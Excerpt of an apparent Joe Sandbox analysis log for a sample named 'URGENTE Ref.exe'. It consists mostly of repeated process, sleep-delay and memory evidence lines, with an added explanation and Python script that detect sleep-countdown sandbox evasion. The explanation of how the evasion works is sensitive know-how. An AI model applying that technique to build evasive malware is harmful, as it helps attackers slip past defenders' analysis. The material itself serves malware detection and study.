          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | API/Special instruction interceptor: Address: 2F3CCF0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Memory allocated: 110000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Memory allocated: 20580000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Memory allocated: 20030000 memory reserve | memory write watch
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 922337203685477 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 600000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599875 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599766 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599647 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599532 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599407 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599282 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599157 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599032 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598922 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598813 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598688 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598563 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598438 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598313 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598203 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598094 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597969 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597485 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597360 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597235 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597110 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596985 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596491 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596368 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596219 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596094 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595985 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595485 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595360 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595235 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595110 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594985 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594485 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594360 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594235 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594110 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 593985 ms
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6555
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3106
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Window / User API: threadDelayed 1695
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Window / User API: threadDelayed 8120
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dll
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224 | Thread sleep time: -7378697629483816 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep count: 38 > 30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -35048813740048126 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -600000 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8084 | Thread sleep count: 1695 > 30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599875 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8084 | Thread sleep count: 8120 > 30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599766 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599647 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599532 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep count: 35 > 30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599407 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599282 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599157 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -599032 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598922 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598813 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598688 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598563 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598438 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598313 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598203 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -598094 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597969 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597860 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597735 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597610 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597485 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597360 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597235 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -597110 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596985 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596860 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596735 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596610 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596491 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596368 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596219 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -596094 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595985 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595860 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595735 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595610 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595485 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595360 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595235 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -595110 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594985 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594860 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594735 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594610 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594485 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594360 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594235 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -594110 ms >= -30000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe TID: 8080 | Thread sleep time: -593985 ms >= -30000 ms
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Last function: Thread delayed
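The sleep evidence above is worth reading as a sequence rather than as individual lines. Thread 8080 of Undismembered.exe first requests a 600000 ms (10 minute) delay and then a run of delays that each shrink by roughly 110 to 125 ms (599875, 599766, 599647, ...). That shape is consistent with a thread that reads a real clock after every sleep and re-sleeps for whatever time is still outstanding, so a sandbox that shortens or skips the sleep gains nothing: the thread simply asks again. The 922337203685477 ms entries are a different thing: 922337203685477 is 2^63 divided by 10000, i.e. the largest positive 100-nanosecond timeout expressed in milliseconds, so those are indefinite blocking waits rather than timed sleeps and are common in managed hosts such as powershell.exe. The script below, an added example and not part of the Joe Sandbox report, parses evidence lines of this kind (both the cleaned "Source: path | finding" layout and the raw fused layout), groups them per process, and separates the three cases: a genuinely long sleep, a remaining-time countdown loop, and an indefinite wait. The thresholds (3 minutes, 30 calls) are taken from the report's own signature wording; the step limit of 1000 ms for the countdown heuristic and the sample lines, a constructed subset of this report's evidence, are assumptions made for the example.

```python
"""Flag sleep-based sandbox evasion in Joe Sandbox 'Thread delayed' evidence lines (added example)."""
import re
from collections import defaultdict

# Thresholds taken from the report's own signature wording; all times are milliseconds.
LONG_SLEEP_MS = 3 * 60 * 1000            # "Contains long sleeps (>= 3 min)"
MANY_CALLS = 30                          # "Thread sleep count: 38 > 30"
INFINITE_WAIT_MS = (1 << 63) // 10_000   # 2^63 100-ns ticks in ms = 922337203685477: an indefinite wait, not a sleep
COUNTDOWN_MAX_STEP_MS = 1000             # assumption: successive delays shrinking by less than this form a countdown

# Accepts both the cleaned "Source: <path> | <finding>" layout and the raw fused "...exeThread delayed..." layout.
_DELAY_RE = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Thread delayed: delay time:\s*(?P<ms>\d+)")
_COUNT_RE = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Window / User API: threadDelayed\s*(?P<n>\d+)")

# Constructed sample: a subset of this report's evidence lines, embedded so the script runs offline.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599875",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599766",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599647",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Memory allocated: 110000 memory reserve | memory write watch",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6555",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Window / User API: threadDelayed 1695",
    r"Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Window / User API: threadDelayed 8120",
]


def parse_evidence(lines):
    """Turn evidence lines into (process, kind, value) tuples; lines of other kinds are ignored."""
    events = []
    for line in lines:
        m = _DELAY_RE.match(line.strip())
        if m:
            events.append((m["proc"], "delay", int(m["ms"])))
            continue
        m = _COUNT_RE.match(line.strip())
        if m:
            events.append((m["proc"], "count", int(m["n"])))
    return events


def analyse(events):
    """Summarise, per process, the sleep behaviour a sandbox analyst cares about."""
    delays = defaultdict(list)
    calls = defaultdict(int)
    for proc, kind, value in events:
        if kind == "delay":
            delays[proc].append(value)       # keep report order: it is the thread's call order
        else:
            calls[proc] = max(calls[proc], value)
    findings = {}
    for proc in set(delays) | set(calls):
        finite = [ms for ms in delays[proc] if ms < INFINITE_WAIT_MS]
        # A run of delays that each shrink by a small amount is a thread re-sleeping for the
        # remaining time after reading a real clock; shortening its sleeps gains the sandbox nothing.
        steps = [a - b for a, b in zip(finite, finite[1:])]
        countdown = len(steps) >= 2 and all(0 < s <= COUNTDOWN_MAX_STEP_MS for s in steps)
        findings[proc] = {
            "max_sleep_ms": max(finite, default=0),
            "long_sleep": any(ms >= LONG_SLEEP_MS for ms in finite),
            "infinite_waits": sum(1 for ms in delays[proc] if ms >= INFINITE_WAIT_MS),
            "countdown_loop": countdown,
            "sleep_calls": calls[proc],
            "many_calls": calls[proc] > MANY_CALLS,
        }
    return findings


def is_evasive(f):
    """Indefinite waits are blocking waits rather than timed sleeps, and a high call count alone
    is common in managed hosts, so neither counts on its own; a real multi-minute sleep or a
    remaining-time countdown is what marks sleep-based sandbox evasion."""
    return f["long_sleep"] or f["countdown_loop"]


if __name__ == "__main__":
    for proc, f in analyse(parse_evidence(SAMPLE_LINES)).items():
        print(f"{'EVASIVE' if is_evasive(f) else 'ok     '} {proc}: {f}")
```

Run against the constructed sample, Undismembered.exe is flagged for both the 10 minute sleep and the countdown loop, while powershell.exe shows only an indefinite wait and a large sleep-call count and is not flagged. Feed the script the whole evidence section of a report, not just the "Contains long sleeps" block, because the countdown pattern is only visible across consecutive lines of the same thread.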
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_00406167 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_00402688 FindFirstFileA
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00406167 FindFirstFileA,FindClose
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00402688 FindFirstFileA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 922337203685477 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 600000 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599875 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599766 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599647 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599532 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599407 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599282 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599157 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 599032 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598922 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598813 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598688 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598563 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598438 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598313 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598203 ms
